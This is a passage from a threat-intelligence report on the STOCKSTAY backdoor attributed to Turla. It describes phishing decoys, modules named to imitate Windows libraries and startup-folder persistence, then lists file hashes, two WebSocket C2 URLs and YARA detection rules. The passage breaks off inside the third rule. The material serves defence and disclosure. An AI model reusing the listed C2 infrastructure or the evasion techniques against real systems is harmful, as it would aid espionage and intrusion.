&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The second decoy, observed as “Товари(докладніше).docx” (“Products (more details).docx”) and “Приклади товарів для листа (деталізовано).docx” (“Examples of products for the letter (detailed).docx”), predominantly comprised of an equipment list referencing: “Tactical medicine”; “Communication and surveillance equipment”; “Equipment and survival equipment”; and “Automotive property” (see Figure 11).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="“Equipment List” Decoy document from November 2025" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig11.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 11: “Equipment List” Decoy document from November 2025&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each of the decoy documents contained an external image reference that causes a connection to be made from the victim’s machine to a site likely monitored by the threat actor, signaling that the document has been opened. GTIG believes the URLs referenced by the decoy documents may be hosted on compromised infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified that the instances of STOCKSTAY observed being deployed during this operation contained enhancements intended to increase resistance to detection, specifically by carving out functionality into external modules. These external modules were named to imitate legitimate Windows libraries, using the filenames shown in Table 20.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Component&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSViewer.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Shared STOCKSTAY core module&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-lib-math-core.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSDriver.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER core module&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-api-wmcpdt.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSRender.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER core module&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-api-win-render.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 21: STOCKSTAY component filenames observed in November 2025&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG observed two distinct STOCKSTAY WebSocket C2 URLs being used during this phishing wave. The majority of instances used the URL &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://driverx86-adobe.onrender.com/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;; however, we were able to identify at least one instance of STOCKSTAY using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://google-ai-labs-it.onrender.com/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, corresponding to the previously described GitHub repository associated with the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ChikenFresh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; user.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alongside the core STOCKSTAY components, the malicious RAR archives contained LNK files, described as “Updater Shortcut”, corresponding to each core STOCKSTAY component. The extraction file path was configured to attempt to deploy into the startup programs directory. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG was able to identify that the actor began creating the LNK files for this operation approximately six hours prior to the first phishing emails being sent, with the Ukrainian-language lure documents being created around four hours prior.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSViewer.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;a40bf9c75d1bfa6d66f1179f2321de6589f80d3089d992797a9cb0e84f6196ce&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSViewer.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e316b1e13154dc6115e1e0c023f6fe3d17861cae839d4a4a81779b6aad9a24f8&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSDriver.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;c905cb512018cc55512c6a22677c3d6f389c47afd54d7c85797868fc4fcb90e9&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSRender.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;667a8f568a611f2f3d84a366b7946b360e055bece9699c95aad619637ab72a38&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-lib-math-core.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Module containing core crypt and obfuscation routines, historically found within core STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b287347a5bff8af360ce0e6500c336b6fe6d97920abc26202c9d843ffebc5f89&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-api-win-render.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Module containing backdoor command handlers, historically found within STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;1682e8d82016b3f10434d2ebac995fd3b6aa812f079bfd7888652e94a994d851&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-api-wmcpdt.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Module containing STOCKSTAY’s IPC logic, historically found within each STOCKSTAY component&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e2a0f4440f67998a0215d49be31746ea192bfcb4dc4ee532a218f8cf13605714&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSViewer.lnk&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;LNK shortcut intended to execute STOCKSTAY.STOCKMARKET&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;3627f582420ad2782d452fe6d13fae42658d1484296351d3916703e25dcadd14&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSRender.lnk&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;LNK shortcut intended to execute STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;77417df21b4b4e8d86b8bda4afeef93fd36f355362586b2d1f51121a82244167&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSDriver.lnk&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;LNK shortcut intended to execute STOCKSTAY.STOCKBROKER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;813c78b5b6ef28a9c0ed35f2c6cd88fc50880ab91f8777dfe7aaccb1c24b08d5&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e83f274bf9914c6cfc0c6b3cdadf089565f49dace4aca93287c22aba9641c8f3&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;f964353b9ae4bedbe62de6c0d7eafa9fb8b87897bbaea483aedaa8ae191834da&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;Table 22: File indicators&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://driverx86-adobe.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://google-ai-labs-it.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 23: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Attribution&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG attributes the STOCKSTAY ecosystem and related activity to threat clusters assessed with high confidence links to Turla, based on the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY uses Windows-1251 during command-processing - an encoding notably designed specifically to support Cyrillic script. This is indicative of a development or operational environment linked to Eastern Europe, the Balkans, or Central Asia. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY has code overlaps with KAZUAR, a widely-attributed proprietary Turla toolkit, based on the recent introduction of K1MORPHER string obfuscation into both malware families within a similar time window.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG observed STOCKSTAY being delivered from compromised infrastructure which was also identified as hosting part of Turla’s victim-facing KAZUAR C2 infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Turla has a consistent focus on targeting Ukrainian Defense and Military organizations, and was identified within a Mandiant Incident Response deploying STOCKSTAY alongside a range of other proprietary Turla malware, such as WILDDAY, DIAMONDBACK, and KAZUAR.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Detections&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Google Security Operations (SecOps)&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;SecOps customers will have access to the following pending-deployment rules. Once fully deployed, these rules will be available under the Mandiant Frontline Threats, Mandiant Hunting and Mandiant Intel Emerging Threats rule packs:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Archiver Extraction To Windows Startup&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Registry Write Registry Run Keys&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Registry Write to Run Registry Key&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Potential RDP File Write From Phishing&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RDP Connection Initiated from Staging Directory&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Onrender Subdomain Suspicious DNS Query&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;YARA Rules&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_ConfigurationFile_2 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects encrypted configuration files associated with STOCKSTAY."
        hash = "40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3"

    strings:
        $s1 = "\"SystemConfiguration\""
        $s2 = "An application for getting information about current events on trading platforms"
        $s3 = "To set the time for updating information, enter a value in minutes in the `Interval` field"
        $s4 = "The `SystemConfiguration` field stores the system settings of the application."
        $s5 = "In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`."
        $s6 = "wss://"

    condition:
        uint16(0) == 0x227B  // {"
        and 4 of ($s*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_ConfigurationFile_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects early configuration files associated with STOCKSTAY."
        hash = "1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f"

    strings:
        $key_required_1 = "\"List 1\""
        $key_required_2 = "\"List 2\""
        $key_required_3 = "\"List 3\""
        $key_dummy_1 = "\"BinanceApi\""
        $key_dummy_2 = "\"CoinbaseCloudApi\""
        $key_dummy_3 = "\"CoinbaseCloudApi Sandbox\""
        $key_dummy_4 = "\"ByBitApi Spot\""
        $key_dummy_5 = "\"ByBitApi Linear\""
        $key_dummy_6 = "\"Info level\""
        $key_dummy_7 = "\"Rate info\""
        $key_dummy_8 = "\"Info level\""

    condition:
        uint8(0) == 0x7B  // {
        and filesize &amp;gt; 500
        and all of ($key_required_*)
        and 3 of ($key_dummy*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_ConfigurationFile_5 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext configuration files used by the STOCKSTAY malware family."
    hash = "6cee9e838792ac5e2098362d68ce93a9a2c095d476dc16b289fe8509c99b2b8b"

  strings:
    $internal_id_1 = "\"internal_id\""
    $internal_id_2 = "\"i_id\""
    $internal_key_1 = "\"internal_key\""
    $internal_key_2 = "\"i_k\""
    $interval_engine_1 = "\"interval_engine\""
    $interval_engine_2 = "\"ie\""
    $level_info_1 = "\"level_info\""
    $level_info_2 = "\"li\""
    $time_scale_1 = "\"time_scale\""
    $time_scale_2 = "\"ts\""
    $span_min_1 = "\"span_min\""
    $span_min_2 = "\"mx1\""
    $span_max_1 = "\"span_max\""
    $span_max_2 = "\"my1\""
    $rate_1 = "\"rate\""
    $rate_2 = "\"rt_x_y\""
    $rate_control_1 = "\"rate_control\""
    $service_1 = "\"service\""
    $service_2 = "\"srv\""
    $days_not_work_1 = "\"days_not_work\""
